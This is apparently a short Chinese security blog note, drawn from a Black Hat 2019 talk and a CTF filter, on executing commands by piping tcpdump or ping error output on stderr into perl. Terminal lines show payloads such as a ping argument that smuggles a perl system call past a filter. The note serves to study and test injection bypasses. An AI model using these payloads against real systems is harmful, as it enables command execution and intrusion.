另类的stderr命令执行方法

前言：今天看了Tsai作者的议题，发现一种另类的stderr命令执行方法，这边简单的记录下

参考文章：https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
参考文章：https://gtfobins.github.io/gtfobins/tcpdump/#command

介绍

今天看了Tsai作者的议题，发现了一个比较有意思的命令执行的方式，比如下面这种情况的执行命令的点如何进行利用？

过滤情况：https://github.com/w0y/CTF-Seminar-Presentations/blob/545d8053d76642a52996357dec3758a3b897df0b/hitcon-2019/virtual-public-network/repro/src/DSSafe.pm

tcpdump stderr命令执行方法

这边Tsai作者在tcpdump可以利用的情况下进行了如下操作，通过#符号注释后面的内容，然后通过perl来执行管道符的stderr来进行命令执行绕过

 root@VM-4-2-ubuntu:~# tcpdump -d -r '123'
tcpdump: 123: No such file or directory
root@VM-4-2-ubuntu:~# tcpdump -d -r '123#'
tcpdump: 123#: No such file or directory
root@VM-4-2-ubuntu:~# tcpdump -d -r '123#' | perl
tcpdump: 123#: No such file or directory
root@VM-4-2-ubuntu:~# tcpdump -d -r '123#' 2>&1 | perl
root@VM-4-2-ubuntu:~# tcpdump -d -r 'print 123#' 2>&1 | perl

通过perl语法来进行命令执行结果如下

tcpdump -d -r 'print 123#' 2>&1 | perl

ping命令

测试了下ping命令也是可以的，平常也可以作为一种payload来进行测试

通过perl语法来进行命令执行结果如下

ping '$x="ls",system$x#' 2>&1 | perl

posted @ 2023-01-20 00:45 zpchcbd 阅读(138) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· 关于metersphere的groovy命令执行

· Apache commons text <= 1.9 命令执行漏洞

· Linux tcpdump 命令使用详解

· 运维系列：tcpdump命令详解

· 【tcpdump】网络通信调试 - tcpdump使用指南

历史上的今天：
2020-01-20 AppLocker提权

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)

另类的stderr命令执行方法

介绍

tcpdump stderr命令执行方法

ping命令

我的标签

随笔档案

博客友链

	root@VM-4-2-ubuntu:~# tcpdump -d -r '123'
	tcpdump: 123: No such file or directory
	root@VM-4-2-ubuntu:~# tcpdump -d -r '123#'
	tcpdump: 123#: No such file or directory
	root@VM-4-2-ubuntu:~# tcpdump -d -r '123#' \| perl
	tcpdump: 123#: No such file or directory
	root@VM-4-2-ubuntu:~# tcpdump -d -r '123#' 2>&1 \| perl
	root@VM-4-2-ubuntu:~# tcpdump -d -r 'print 123#' 2>&1 \| perl

记录部分个人学习和部分实战的笔记 我会慢慢补全部分空白的文章 :)

另类的stderr命令执行方法

介绍

tcpdump stderr命令执行方法

ping命令

我的标签

随笔档案

博客友链

记录部分个人学习和部分实战的笔记我会慢慢补全部分空白的文章 :)